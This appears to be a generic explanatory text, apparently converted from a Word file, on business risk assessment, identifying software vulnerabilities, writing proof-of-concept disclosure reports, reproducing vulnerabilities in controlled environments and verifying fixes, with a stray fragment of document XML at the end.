well-prepared to address potential disruptions and minimize their impact on critical business operations. It forms the foundation for the development of a robust business continuity plan.</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Assessing the risk to a business is a fundamental process for identifying and mitigating potential threats and vulnerabilities. Here's a step-by-step guide on how to assess risk to the business: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Identify Assets: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Begin by identifying the critical assets of the business. These assets can include physical assets (e.g., buildings and equipment), digital assets (e.g., data and IT systems), intellectual property, human resources, and more.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Identify Threats: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List potential threats that could harm the business. Threats can be categorized into various types, such as natural disasters, cyber threats (e.g., malware, hacking), human-related threats (e.g., insider threats), and supply chain disruptions.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Vulnerability Assessment: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 vulnerabilities within the organization. These vulnerabilities can be related to weaknesses in technology systems, physical security, human processes, or compliance issues.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Determine the Likelihood of Threats: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Assess the likelihood of each threat occurring. Consider historical data, geographic location, industry-specific risks, and external factors that may influence the likelihood.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Assess Impact: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Evaluate the potential impact of each threat on the business. This may include financial losses, operational disruptions, reputation damage, regulatory penalties, and legal consequences.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Calculate Risk:</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Calculate the risk for each threat by multiplying the likelihood by the impact. This provides a quantitative measure of risk, which can help prioritize mitigation efforts.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Risk Classification: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Categorize risks into different risk levels or categories (e.g., high, medium, low) based on the calculated risk values. This helps in prioritizing which risks to address first.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Risk Mitigation and Control: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Develop strategies and controls to mitigate or manage identified risks. These strategies may include security measures, disaster recovery plans, insurance, and compliance initiatives.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Risk Assessment Documentation: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Document all risk assessment findings, including the identified risks, likelihood, impact, and mitigation strategies. This documentation serves as the basis for decision-making and future risk management efforts.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Regular Reviews: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Regularly review and update the risk assessment to account for changes in the business environment, new threats, or evolving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Stakeholder Involvement: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Engage key stakeholders, including senior management, department heads, and employees, in the risk assessment process. They can provide valuable insights and perspectives on risks.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Compliance and Regulation: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Ensure that the risk assessment process aligns with industry-specific regulations and compliance requirements. Addressing regulatory compliance is a crucial aspect of risk management.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Reporting and Communication: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Communicate the results of the risk assessment to relevant stakeholders. Clear and concise reporting facilitates decision-making and planning.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14. Continuous Improvement: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Use the insights gained from the risk assessment to improve security and risk management processes continually. Address identified weaknesses and vulnerabilities to enhance the organization's resilience.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Risk assessment is an ongoing process that helps businesses proactively manage and mitigate potential risks. It ensures that organizations are prepared to respond to threats and vulnerabilities in a structured and effective manner, ultimately enhancing their resilience and long-term success.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Identifying vulnerability paths and parameters is essential for understanding how potential security weaknesses can be exploited in a system or application. Here are some methods and approaches to help identify vulnerability paths and parameters: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Source Code Review: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Reviewing the source code of applications and systems can help identify potential vulnerability paths and parameters. Look for insecure coding practices, unsanitized user inputs, and security-critical functions that may be prone to exploitation.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Penetration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Conducting penetration tests or ethical hacking assessments allows security professionals to actively test applications and systems for vulnerabilities. During these tests, they explore different attack vectors to identify vulnerability paths and parameters that may be susceptible to exploitation.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Static Analysis Tools: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Utilize static code analysis tools that can automatically scan source code or binaries for potential vulnerabilities. These tools can help identify code paths and input parameters that could be exploited by attackers.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Dynamic Analysis Tools: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Employ dynamic analysis tools, such as web application scanners, to test running applications for vulnerabilities. These tools can identify security-critical parameters and the paths through which user inputs are processed.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Fuzz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Fuzz testing involves sending a large volume of unexpected or random data to an application to trigger vulnerabilities. It can help identify unexpected paths and parameters that may be vulnerable to input manipulation.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Manual Testing and Exploration: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Security professionals can manually test applications and systems to identify potential vulnerability paths and parameters. This includes exploring different features, functionality, and inputs that may be overlooked by automated tools.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Input Validation and Boundary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Focus on input validation and boundary testing to identify vulnerable parameters. Test input fields with various types of data, including long strings, special characters, and unexpected values, to find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Data Flow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Analyze the data flow within an application to understand how user inputs traverse through different components and layers. This can help identify critical paths where vulnerabilities may exist.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Configuration Review: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Review system and application configurations to identify any parameters or settings that could lead to vulnerabilities. Misconfigurations often result in security weaknesses.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Error Handling and Debugging Information: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Examine error handling and debugging information provided by applications. Sometimes, error messages or debugging outputs reveal sensitive information or vulnerability paths.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Input and Output Logging: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Enable extensive input and output logging to monitor how user inputs are processed and how the application responds. Analyzing logs can help identify potential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Threat Modeling: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threat modeling techniques to systematically identify potential vulnerability paths and parameters based on the specific architecture and design of the application or system.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External Resources and References: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Stay informed about emerging vulnerabilities and common attack vectors by referring to security resources, such as the Common Vulnerabilities and Exposures (CVE) database and security bulletins.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Consult Experts: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Seek the expertise of experienced security professionals, ethical hackers, or consultants who specialize in vulnerability identification. They can offer valuable insights and guidance.</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Identifying vulnerability paths and parameters is a critical aspect of proactive security testing and risk mitigation. A combination of these methods and continuous vigilance is essential to stay ahead of potential threats and vulnerabilities.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Vulnerability paths and parameters refer to the routes and elements within a system or application that can be exploited by attackers to compromise security. There are various types of vulnerability paths and parameters, each associated with specific security risks. Here are some common types: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Injection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Path: User input fields or data entry points.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Data input, such as SQL queries, command injection, or script injection. Common examples include SQL injection (SQLi), Command injection, and Cross-Site Scripting (XSS).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Authentication and Authorization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Path: Authentication and authorization mechanisms.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User credentials, session tokens, and privilege levels. Vulnerabilities may include weak passwords, insufficient session management, or privilege escalation.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Configuration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Path: System or application configuration settings.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Misconfigured settings, exposed sensitive files or directories, and excessive permissions. Examples include open ports, default credentials, and sensitive files left accessible.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Path Traversal and Directory Listing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Path: File and directory navigation.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Manipulated URLs or input that can traverse directories and access unauthorized files or directories. Commonly known as Directory Traversal or Path Traversal.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Cross-Site Request Forgery (CSRF)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Path: Web forms and URLs.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State-changing requests initiated by malicious actors on behalf of authenticated users. Attackers may forge requests that lead to unintended actions.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Insecure Deserialization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Path: Data serialization and deserialization processes.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Serialized objects, user-controlled data structures, and untrusted data. Insecure deserialization can lead to remote code execution.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Information Disclosure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Path: Error messages, debugging information, and log files.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Sensitive information exposed unintentionally, such as stack traces, internal system data, or user details.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Cryptographic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Path: Encryption and decryption processes.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Weak cryptographic keys, insecure algorithms, and poor encryption practices, leading to data breaches or unauthorized access.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XML External Entity (XXE)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Path: XML data parsing.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Parameters: Malicious XML documents that reference external entities, potentially leading to information disclosure, denial of service, or remote file inclusion.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Access Control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Path: User roles and permissions.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Parameters: Insufficient or misconfigured access controls, enabling unauthorized access to resources, data, or actions. Examples include privilege escalation and unauthorized file access.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Buffer Overflow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Path: Memory handling within applications.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Parameters: Excessive data input or unchecked input, leading to memory corruption and potentially code execution. Buffer overflow is a common type of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Cross-Site Scripting (XSS)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Path: Web pages and user input fields.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Parameters: Injected malicious scripts that execute within users' browsers. XSS can lead to data theft, session hijacking, and other attacks.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Misconfiguration of APIs and Cloud Services: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Path: APIs, cloud configurations, and serverless functions.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Parameters: Incorrectly configured settings, such as API keys, access control, and data storage, that expose sensitive data or functionality.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Each of these vulnerability paths and parameters represents a potential weakness that can be exploited by attackers. Identifying and addressing these vulnerabilities is a critical aspect of securing systems, applications, and data from various threats.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Identifying vulnerability paths and parameters is a critical step in the process of assessing and securing systems and applications. Various tools and techniques are available to help security professionals identify these potential weaknesses. Here are some common tools and techniques for this purpose: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Penetration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Tools: Penetration testing tools like Metasploit, Burp Suite, and OWASP ZAP are used to actively test applications and systems for vulnerabilities, including paths and parameters.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Vulnerability Scanners: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Tools: Tools like Nessus, Qualys, and OpenVAS are automated vulnerability scanners that can identify known vulnerabilities, including path traversal, injection, and misconfigurations.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Code Review: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Technique: Manual or automated source code reviews help identify vulnerabilities in the code, including injection, authentication, and access control issues.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Fuzz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Tools: Fuzz testing tools like American Fuzzy Lop (AFL) and Sulley help discover vulnerabilities by sending malformed or unexpected inputs to applications.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Dynamic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Technique: Dynamic analysis involves monitoring an application during runtime to identify vulnerabilities, including injection and authentication problems.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Static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Tools: Static analysis tools like Fortify and Checkmarx examine the source code or binary to identify vulnerabilities, including input validation issues.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Threat Modeling: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Technique: Threat modeling helps identify potential vulnerability paths and parameters by systematically analyzing the architecture and design of an application or system.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Web Application Scanners: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Tools: Web application security scanners like Acunetix, Nikto, and w3af are specialized in identifying web application vulnerabilities, including XSS, CSRF, and injection flaws.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DAST (Dynamic Application Security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Tools: DAST tools like OWASP ZAP and AppSpider test web applications for vulnerabilities during runtime, helping identify injection and other web-related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Dependency Scanners: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Tools: Dependency scanning tools like OWASP Dependency-Check and Retire.js identify vulnerabilities in third-party libraries and dependencies, which can indirectly affect an application's security.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Configuration Scanning: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Tools: Tools like Lynis and CIS-CAT scan system and application configurations for vulnerabilities and misconfigurations.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Input Validation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Technique: Manually testing inputs for applications by using various test cases, including special characters, long strings, and unexpected values, helps identify injection vulnerabilities and other weaknesses.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Log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Tools: Log analysis tools like the ELK Stack (Elasticsearch, Logstash, and Kibana) can help identify unusual and potentially exploitable log entries.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14. Parameter Tampering and Manipulation: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Technique: Manually manipulating input parameters in web applications to observe the application's behavior and identify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15. Security Headers Checkers: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Tools: Tools like SecurityHeaders.io or Mozilla Observatory help identify missing or misconfigured security headers that can lead to security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16. Vulnerability Databases and Lists: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Resources: References to databases and lists such as CVE, CWE, OWASP Top Ten, and NVD provide information on known vulnerabilities and weaknesses.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Security professionals often use a combination of these tools and techniques to comprehensively identify vulnerability paths and parameters within applications and systems. Regular scanning, testing, and analysis are essential to maintaining the security of an organization's digital assets.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Identifying vulnerability paths and parameters is a critical component of a robust cybersecurity program. Following best practices can help organizations effectively identify and mitigate these security weaknesses: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Automated Tools and Scanners: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Employ automated vulnerability scanning and testing tools to identify common vulnerabilities efficiently. Tools like Nessus, Burp Suite, and OWASP ZAP can help identify paths and parameters that may be susceptible to exploitation.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Regularly Update and Patch Systems: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Keep systems, applications, and dependencies up-to-date with the latest security patches. Regular updates help prevent known vulnerabilities from being exploited.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Conduct Frequent Code Reviews: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Perform regular code reviews to identify and address vulnerabilities in the source code. Manual or automated code reviews can reveal potential issues in the application logic and parameter handling.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Implement Input Validation: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Ensure that all user inputs, both from users and external sources, are validated and sanitized to prevent injection attacks. Implement strict input validation rules for both web and non-web applications.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Apply Strong Access Controls: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Implement robust access controls to restrict access to sensitive resources. Properly enforce authentication and authorization mechanisms to protect against unauthorized access.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Content Security Policies (CSP):</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Implement CSP headers in web applications to mitigate Cross-Site Scripting (XSS) vulnerabilities by specifying which scripts are allowed to execute in the browser.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Implement Security Headers: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Utilize security headers like Content Security Policy (CSP), Strict-Transport-Security (HSTS), X-Content-Type-Options, and X-Frame-Options to enhance security and mitigate common web-based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Leverage Web Application Firewalls (WAFs):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Deploy WAFs to filter and monitor HTTP requests and responses, helping to block known attack patterns and protect against common web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Data Encryption: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Encrypt sensitive data both in transit and at rest. Use secure encryption protocols to protect data from eavesdropping or theft.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Log and Monitor User Activity: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Implement comprehensive logging and monitoring of user activity, application behavior, and system events. Analyze logs to detect anomalies and potential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Error Handling and Logging Best Practices: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Implement secure error handling and ensure that error messages do not leak sensitive information. Log error details without revealing sensitive data.</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Secure File Uploads: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file uploads are required, use strict validation and allowlisting to ensure that uploaded files cannot be executed or used to exploit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Security Training and Awareness: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security training and awareness programs for development teams and staff to ensure that they understand the importance of secure coding practices and parameter handling.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Regularly Conduct Vulnerability Assessments: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Periodically assess and test your applications and systems for vulnerabilities. This should include penetration testing, vulnerability scanning, and dynamic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Secure Development Lifecycle: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Integrate security practices into the software development lifecycle (SDLC). Implement secure coding guidelines and conduct security reviews at each development stage.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Threat Modeling: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Develop threat models for your applications and systems to identify potential vulnerability paths and parameters based on their unique architecture and design.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Patch Management Process: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Establish a robust patch management process that ensures timely application of security patches and updates to all systems and applications.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Collaboration and Communication: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Foster collaboration between development, operations, and security teams to ensure vulnerabilities are promptly addressed and patched.</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By following these best practices, organizations can proactively identify and mitigate vulnerability paths and parameters, reducing the risk of security breaches and data compromises. A strong security posture relies on a combination of technical measures, secure coding practices, and vigilant monitoring.</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Identifying vulnerability paths and parameters is a crucial aspect of cybersecurity, but it comes with several challenges and limitations that organizations should be aware of:</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Evolving Threat Landscape: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The threat landscape is constantly evolving. New vulnerabilities and exploitation techniques emerge regularly, making it challenging to keep up with the latest threats.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Vulnerability identification may not always catch the most recent or novel attack vectors.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False Positives and Negatives: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Automated vulnerability scanning tools can produce false positives (identifying non-existent vulnerabilities) and false negatives (missing actual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Over-reliance on automated tools may result in missing real vulnerabilities or wasting time on false alarms.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Complex and Custom Applications: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Complex and custom applications often have unique parameters and behaviors, making it challenging to assess and identify vulnerabilities accurately.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Automated tools may not adequately cover all aspects of custom applications.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Zero-Day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Zero-day vulnerabilities, for which there are no known patches or fixes, are particularly challenging to identify and address.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Vulnerability identification cannot mitigate the risk of unknown zero-days.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Encrypted Traffic:</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The increasing use of encryption can make it difficult to inspect network traffic for vulnerabilities and malicious content.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Some vulnerabilities may remain hidden within encrypted traffic.</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False Sense of Security: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Relying solely on vulnerability identification may create a false sense of security. Even when vulnerabilities are identified, they may not always be remediated in a timely manner.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The mere identification of vulnerabilities does not guarantee effective risk mitigation.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Lack of Context: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Vulnerability scanning tools often lack context about the organization's specific environment, which can result in false positives or misaligned priorities.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Identifying vulnerabilities without context may lead to inefficient remediation efforts.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Vulnerability Complexity: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Some vulnerabilities are complex and require a deep understanding of the application or system's architecture and functionality.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Inadequate understanding of complex vulnerabilities may result in incomplete identification.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Limited Visibility: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Identifying vulnerabilities within certain parts of the network or within cloud environments can be challenging, especially if visibility is limited.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Vulnerabilities may go undetected in areas that lack adequate monitoring and scanning.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Resource Constraints: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Challenge: Limited resources, such as time and personnel, can restrict the ability to comprehensively scan and identify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Limitation: Vulnerability identification efforts may be constrained by resource limitations.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False Negatives in Intricate Systems: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Challenge: Intricate and highly customized systems may produce false negatives due to the intricacies of the system's design.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Limitation: Identifying vulnerabilities accurately in intricate systems can be more challenging.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Continuous Monitoring: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Challenge: Vulnerabilities can appear after an initial assessment. Continuous monitoring is needed to identify vulnerabilities that may emerge over time.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Limitation: A one-time assessment may not capture vulnerabilities that develop after the assessment.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Network Complexity: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Challenge: In large, complex networks, the volume of data to be assessed can be overwhelming, leading to potential oversight.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Limitation: Large networks may pose challenges in comprehensively identifying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 overcome these challenges and limitations, organizations should adopt a holistic approach to security, which includes continuous monitoring, threat intelligence, vulnerability management processes, and a proactive security posture. While vulnerability identification is a critical step, it should be part of a broader security strategy that also encompasses risk mitigation and incident response.</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Providing detailed instructions is of paramount importance in various aspects of life and work, and it offers numerous benefits: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Clarity and Understanding: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instructions provide clarity and leave no room for ambiguity. This is especially important in tasks or processes that require precision, ensuring that everyone understands what needs to be done.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Consistency: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instructions help maintain consistency in processes and procedures. When everyone follows the same set of instructions, the results are more predictable and uniform.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Efficiency and Productivity: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Clear and detailed instructions save time and reduce the likelihood of errors. They streamline tasks and help individuals or teams complete their work more efficiently.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Quality Assurance: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 manufacturing, research, healthcare, and various industries, detailed instructions are essential for ensuring quality control and meeting regulatory or compliance standards.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Learning and Training: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 educational and training contexts, detailed instructions aid in the transfer of knowledge. They help learners grasp complex concepts and develop new skills.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Safety and Risk Mitigation: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safety instructions are crucial in environments where risks are present, such as construction sites, laboratories, or healthcare facilities. They help prevent accidents and injuries.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Communication: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instructions enhance communication by providing a clear framework for conveying information. This is particularly important in teamwork and project management.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Accountability and Evaluation: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instructions establish clear expectations, making it easier to hold individuals or teams accountable for their actions. They also facilitate evaluation and performance assessment.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Problem Solving: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When issues or challenges arise, detailed instructions can serve as a reference for troubleshooting and resolving problems.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Compliance and Legal Requirements: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In legal and regulatory contexts, detailed instructions are essential for ensuring compliance with laws, regulations, and contractual obligations.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Replicability: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In scientific research and experimentation, detailed instructions make it possible to replicate experiments, fostering transparency and the validation of results.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Customer Satisfaction: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Providing detailed instructions with products or services enhances the customer experience. It helps users understand how to use a product effectively and resolve common issues on their own.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Risk Management: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In financial and business contexts, detailed financial instructions are essential for managing investments, mitigating financial risks, and making informed decisions.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14. Documentation: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For historical records and documentation, detailed instructions provide a written account of how processes were carried out, which can be valuable for future reference or audits.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15. Adaptation and Scaling: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Detailed instructions can be adapted and scaled as needed to accommodate changes in circumstances, such as growth, market shifts, or unexpected challenges.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 summary, detailed instructions are essential for achieving consistency, efficiency, quality, safety, and effective communication in various domains. They not only enable individuals and organizations to meet their objectives but also contribute to learning, problem-solving, and overall success.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 well-written vulnerability reproduction instruction, often referred to as a proof of concept (PoC), is a critical component in the vulnerability disclosure process. It helps security researchers, ethical hackers, or others communicate the details of a discovered vulnerability to the affected party, enabling them to understand and replicate the issue for remediation. Here are the key components of a well-written vulnerability reproduction instruction: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Title and Description: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Begin with a clear and concise title that summarizes the vulnerability. Follow it with a brief description of the vulnerability's nature and potential impact.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Affected Software/Platform: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Clearly state the software, application, or platform version that is affected by the vulnerability. Include the build or release numbers if applicable.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Vulnerability Type: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Specify the type of vulnerability, such as SQL injection, Cross-Site Scripting (XSS), buffer overflow, or any other relevant category.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CVE Identifier (if assigned):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a Common Vulnerabilities and Exposures (CVE) identifier has been assigned, include it in the instruction.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PoC Code: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the proof-of-concept code that demonstrates how the vulnerability can be exploited. This code should be clear and well-commented.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Steps to Reproduce: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Outline the steps required to reproduce the vulnerability. Be specific and include all prerequisites, inputs, and conditions needed to trigger the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Configuration Details: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the vulnerability is specific to certain configurations, specify those settings or configurations. Include details about the environment, such as operating systems and software versions.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Screenshots or Logs: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Include screenshots, log entries, or any other relevant documentation that visually demonstrates the vulnerability in action.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Impact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Describe the potential impact of the vulnerability on the affected system or data. Consider the consequences for confidentiality, integrity, and availability.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Mitigation or Remediation Recommendations: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Offer suggestions or recommendations for mitigating the vulnerability. Provide guidance on how to remediate the issue, such as patches or configuration changes.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References and Resources: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Include references to related resources, such as links to official documentation, relevant security standards, or other relevant materials.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Contact Information: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your contact information, including your name, email address, and, if relevant, your organization or affiliation.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Disclosure Policy Adherence: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Ensure that your instruction complies with any responsible disclosure policies or guidelines set by the affected party or relevant security organizations.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Legal and Ethical Considerations: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Highlight the importance of responsible and ethical disclosure. Encourage the affected party to acknowledge and address the vulnerability promptly.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Acknowledgment and Communication Expectations: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Specify your expectations for acknowledgment of the report and the timeline for communication regarding the vulnerability's status and resolution.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Request for Confirmation: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Invite the affected party to confirm receipt of the report and to acknowledge their intent to address the vulnerability.</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 well-written vulnerability reproduction instruction should be clear, comprehensive, and actionable. It should enable the affected party to understand the vulnerability, replicate it, and take the necessary steps to remediate the issue. Responsible and ethical disclosure is crucial to ensuring that vulnerabilities are addressed promptly and responsibly.</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Reproducing vulnerabilities is a crucial step in the process of identifying and verifying security issues within a system or application. This process helps ensure that the reported vulnerability is real and can be consistently demonstrated. Here are the general steps for reproducing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Understand the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Start by thoroughly understanding the reported vulnerability or the one you want to investigate. Analyze any available information, such as vulnerability reports, proof-of-concept (PoC) code, and related documentation.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Set Up a Controlled Environment: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Create a controlled and isolated environment that mimics the affected system or application. This allows you to conduct tests without affecting production systems.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Document Configuration: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Document the configurations and settings of the environment, including the version of the software, hardware specifications, network topology, and any relevant parameters. This information helps ensure consistent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Prepare the PoC Code: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a PoC code is available, review and prepare it for testing. Ensure that it is well-documented and that you understand how it exploits the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Reproduce the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Follow the documented steps or PoC code to reproduce the vulnerability. Ensure that you replicate the conditions and inputs exactly as specified.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Document the Results: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Carefully document the results of your testing. Note any error messages, behavior changes, or unexpected outcomes. Take screenshots or capture logs, if relevant.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Test Variations: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Try different variations and inputs to validate the vulnerability. This can help determine the extent of the issue and any potential attack vectors.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Testing Across Platforms and Environments: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applicable, test the vulnerability across different platforms, operating systems, and configurations to determine the extent of its impact.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Verify the Impact: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Evaluate the potential impact of the vulnerability. Determine if it affects the confidentiality, integrity, or availability of the system or data.</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Record Evidence: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Document the entire process, including steps, configurations, results, and observations. Clear and comprehensive records will be essential for communicating the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Test Mitigation Measures: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mitigation measures or patches are available, test their effectiveness in addressing the vulnerability. Document the results of these tests as well.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Report Findings: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you are a security researcher or ethical hacker, report your findings to the affected party or organization responsibly and according to their disclosure policy. Provide a well-documented vulnerability report, including the steps you followed to reproduce the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Responsible Disclosure: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the vulnerability is confirmed, consider responsible disclosure. Share the findings with the affected party and allow them time to address the issue before public disclosure.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Continual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Continue to test and monitor the vulnerability after any remediation actions are taken to ensure that it has been successfully addressed.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Reproducing vulnerabilities is a meticulous process that requires attention to detail and a controlled testing environment. By following these steps, you can accurately validate the existence of a vulnerability and provide the necessary information to the affected party for mitigation. Responsible disclosure is critical to ensure that vulnerabilities are addressed promptly and ethically.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Writing effective vulnerability reproduction instructions is essential for clear and successful communication with the affected parties, whether it's a software vendor, system administrator, or security team. Here are best practices to follow when crafting these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Clarity and Precision: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clear and concise language. Ensure that your instructions are easy to understand, even for non-technical readers.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Structured Format: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Organize your instructions in a structured format, such as a step-by-step guide or a numbered list. This makes it easier for the reader to follow.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Title and Description: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Begin with a clear title and a brief description of the vulnerability to provide context.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Steps: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a step-by-step guide on how to reproduce the vulnerability. Include all prerequisites, inputs, and actions necessary to trigger the issue.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Configuration Details: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Clearly specify the configuration and environment settings required to replicate the vulnerability. This information ensures accuracy in reproduction.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of Proof-of-Concept (PoC):</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applicable, include PoC code or script to demonstrate the vulnerability. Ensure that the code is well-commented and thoroughly explained.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Screenshots and Logs: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Incorporate relevant screenshots or logs to illustrate the vulnerability in action. Annotated images can be particularly helpful.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Explicit Input Data:</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Specify the exact input data, including payloads, parameters, or user interactions necessary to reproduce the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Expected and Actual Results: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Clearly document both the expected results and the actual results during reproduction. Explain any discrepancies.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Impact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Describe the potential impact of the vulnerability, including its effect on confidentiality, integrity, and availability of data or systems.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Reproducibility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Ensure that the vulnerability can be consistently reproduced. Test it across different platforms, operating systems, and configurations, if relevant.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Data Sanitization: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Ensure that any data shared in the instructions has been sanitized to remove sensitive or confidential information.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Consider the Audience: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Tailor the level of technical detail to the intended audience. Provide additional technical information in appendices or footnotes if needed.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Legal and Ethical Guidelines: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Emphasize the importance of responsible and ethical disclosure. Encourage the affected party to acknowledge and address the vulnerability promptly.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Responsible Disclosure Policy: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Include instructions for reporting the vulnerability and adhere to any responsible disclosure policy or guidelines established by the affected party or relevant security organizations.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Contact Information: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your contact information, including your name, email address, and, if applicable, your organization or affiliation.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Legal Disclaimers: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Include any legal disclaimers or terms of use that may apply when providing PoC code or any other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Communication Expectations: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Clearly specify your expectations for acknowledgment and communication regarding the vulnerability's status and resolution.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a Deadline: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Suggest a reasonable deadline for addressing the vulnerability, allowing the affected party time to remediate.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Test Mitigation Measures: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mitigations or patches are available, test them and include the results in your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Multiple Reviews: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Have your instructions reviewed by peers or colleagues to ensure they are comprehensive and accurate.</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By following these best practices, you can create effective and comprehensive vulnerability reproduction instructions that help the affected party understand the issue, replicate it, and take the necessary steps for remediation. Responsible and ethical disclosure is crucial to ensuring that vulnerabilities are addressed promptly and responsibly.</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Verifying vulnerability fixes is a crucial step in the security patch management process. It ensures that the applied patches or remediation actions have effectively addressed the identified vulnerabilities without introducing new issues. Here are tools and techniques for verifying vulnerability fixes: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Vulnerability Scanners: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Utilize vulnerability scanning tools like Nessus, Qualys, OpenVAS, or Nexpose to assess the system or application after applying patches. These tools can identify if the vulnerabilities have been successfully mitigated.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Penetration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Conduct penetration tests on the system or application post-remediation to verify the absence of the identified vulnerabilities. Ethical hackers can simulate real-world attacks to confirm that the system is secure.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Code Review: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For vulnerabilities in custom code or applications, perform code reviews to ensure that the identified issues have been addressed. Verify that the vulnerable code has been patched or modified.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Web Application Scanners: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the vulnerabilities were related to web applications, use web application security scanners like Acunetix, Burp Suite, or OWASP ZAP to check for the presence of vulnerabilities after remediation.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Automated Testing Suites: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automated testing suites to validate that the vulnerability fixes did not introduce new issues or regressions. Tools like Selenium for web applications or automated test scripts can help.</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Configuration Scanners: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Check system configurations and settings to ensure that no misconfigurations have been introduced during remediation. Tools like Lynis or CIS-CAT can help verify system configurations.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Log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Analyze system and application logs to detect any unusual or unauthorized activities. Monitoring log files can help identify signs of intrusion or exploitation.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Network Monitoring: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Continuously monitor network traffic to identify any anomalies or suspicious activities that may indicate the presence of unpatched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Endpoint Security Solutions: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Endpoint security solutions, such as antivirus and intrusion detection systems, can help detect and prevent attacks that target known vulnerabilities. Ensure that these tools are up to date.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Application Whitelisting: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Employ application whitelisting to allow only authorized and known applications to run. This can prevent unpatched or malicious applications from executing.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Configuration Management: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Implement configuration management tools and practices to ensure that system configurations are consistent and adhere to security standards.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Manual Testing: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Manually test the system or application to confirm that the identified vulnerabilities have been resolved. This may include performing the same steps that initially revealed the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Review Patch Notes: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Carefully review the patch or update notes provided by the software vendor. Ensure that the vulnerabilities in question are listed as addressed in the release notes.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14. Test in a Staging Environment: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Before applying patches or remediation in a production environment, test them in a controlled staging environment to verify their effectiveness without risking production systems.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15. Threat Modeling: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Revisit the threat model to ensure that the vulnerability fixes adequately address the identified threats and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16. Collaboration with Vendors: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Collaborate with software vendors or third-party experts to validate vulnerability fixes. They may provide additional guidance and verification support.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17. Documentation and Compliance Checks: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Ensure that the remediation process adheres to relevant compliance standards and that proper documentation is maintained.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Verifying vulnerability fixes is a critical part of maintaining a secure environment. It helps ensure that vulnerabilities are effectively mitigated and that new issues are not introduced during the remediation process. A combination of automated tools, manual testing, and security best practices should be employed to thoroughly verify the effectiveness of vulnerability fixes.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Creating vulnerability reproduction instructions is a critical aspect of the vulnerability disclosure process, but it comes with its own set of challenges and limitations. Understanding these challenges is essential for both those reporting vulnerabilities and those tasked with remediation. Here are some common challenges and limitations of vulnerability reproduction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Complexity of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Some vulnerabilities are highly complex, involving intricate chains of events or dependencies that are difficult to document comprehensively.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Reproducing such vulnerabilities with complete accuracy can be challenging, and instructions may not fully capture the intricacies.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Environment Variability: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Variability in the target environment, including different operating systems, configurations, and software versions, can lead to differences in vulnerability manifestation.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Reproduction instructions may not cover all possible environmental variations, and what works in one environment may not work in another.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Incomplete Information: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Vulnerability reporters may not have access to all the necessary information about the target system or application, limiting their ability to create detailed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Incomplete information can result in vague or incomplete reproduction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Ethical Concerns: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In some cases, the responsible disclosure process may require withholding specific details or PoC code for ethical reasons.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This ethical constraint may hinder the ability to create comprehensive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Lack of Expertise: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Vulnerability reporters may lack the necessary expertise to create detailed instructions, particularly when the vulnerability is complex or novel.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Inadequate instructions may hinder the recipient's ability to understand and address the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Non-Deterministic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Some vulnerabilities are non-deterministic, meaning they do not occur consistently or predictably.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Non-deterministic vulnerabilities are challenging to reproduce and document accurately.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New Vulnerabilities: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For zero-day vulnerabilities, where no patches or remediations are available, the lack of solutions limits the ability to provide full reproduction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Instructions for these vulnerabilities may be limited to describing the issue rather than providing a fix.</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Limited Access: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In cases where the vulnerability is discovered in a third-party application or service, the reporter may have limited access to the target system, making it difficult to reproduce the vulnerability fully.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Reproduction instructions may be incomplete due to limited access.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Environmental Noise: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Challenge: System and network noise, unrelated to the vulnerability, can affect the accuracy of reproduction attempts.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Limitation: Environmental noise can make it challenging to isolate and document the specific vulnerability.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Dynamic Systems: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Challenge: Dynamic and ever-changing systems, such as web applications with user-generated content, pose difficulties in creating precise reproduction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Limitation: Accurate reproduction may be hindered by the dynamic nature of the system.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Interpretation and Context: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Challenge: The instructions may require interpretation and context, which can vary among individuals, leading to differences in understanding and reproduction.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Limitation: Variability in interpretation can lead to discrepancies in the reproduction process.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Rapid Remediation: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Challenge: In some cases, software vendors may remediate vulnerabilities quickly, leaving reporters with limited time to create detailed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Limitation: Timeliness can affect the thoroughness of reproduction instructions.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Despite these challenges and limitations, it is essential to strive for clear and comprehensive vulnerability reproduction instructions to facilitate effective vulnerability remediation. Close collaboration between vulnerability reporters and affected parties can help overcome some of these challenges and ensure accurate and efficient vulnerability mitigation.</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Comprehensive and detailed reporting is essential in various contexts, from cybersecurity to research, project management, and beyond. It provides a range of benefits, as outlined below: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Accurate Understanding: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reports ensure that the reader gains an accurate and in-depth understanding of the subject matter. This is crucial for informed decision-making and problem-solving.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 Effective Communication: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Comprehensive reports facilitate effective communication, allowing the sender to convey complex information, findings, or recommendations clearly and thoroughly.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Informed Decision-Making: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reporting provides decision-makers with the information and insights they need to make informed choices, whether related to business strategies, policy decisions, or security measures.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Problem Identification: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Comprehensive reporting can help identify problems or vulnerabilities, enabling timely intervention or remediation before they escalate.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Accountability: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reports hold individuals or organizations accountable for their actions, providing a record of what was done and who was responsible.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 Documentation and Compliance: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Comprehensive reporting is crucial for maintaining records, meeting regulatory requirements, and ensuring compliance with legal standards and industry regulations.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 Quality Assurance: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Detailed reports are a fundamental part of quality assurance, helping to confirm that processes and products meet predefined standards and criteria.</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 Continuous Improvement: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Through detailed reports, organizations can identify areas for improvement and implement changes based on data-driven insights.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 Transparency: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Comprehensive reports promote transparency, demonstrating a commitment to openness and honesty in both internal and external communications.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10. Risk Management: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Detailed reports help assess and manage risks effectively, enabling organizations to identify potential threats, vulnerabilities, and weaknesses.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11. Research and Innovation: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In research and development, comprehensive reporting is essential for documenting findings, experiments, and innovations, which can be used as a basis for further study or innovation.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12. Knowledge Sharing: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Detailed reporting allows for the sharing of knowledge and expertise within an organization or community, promoting learning and growth.</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13. Project Management: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In project management, comprehensive reporting tracks progress, milestones, issues, and resources, ensuring that projects stay on track and within budget.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14. Legal and Ethical Compliance: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Detailed reports help organizations comply with laws and ethical guidelines by providing a clear record of their actions and practices.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15. Performance Evaluation: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Comprehensive reporting allows for the evaluation of performance and outcomes, both for individuals and organizations, facilitating continuous improvement.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16. Incident Response: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In cybersecurity and incident response, detailed reports on security incidents are crucial for understanding the nature of the breach, its impact, and the steps needed for recovery and prevention.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17. Learning and Training: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Detailed reports serve as educational materials for training programs, helping individuals learn from past experiences and mistakes.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 summary, comprehensive and detailed reporting is a cornerstone of effective communication, accountability, transparency, and decision-making. It serves a wide range of purposes, from documenting information and facilitating compliance to driving improvements and innovations. Whether in business, research, cybersecurity, or other fields, the importance of detailed reporting cannot be overstated.</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7F7F8" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="300"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
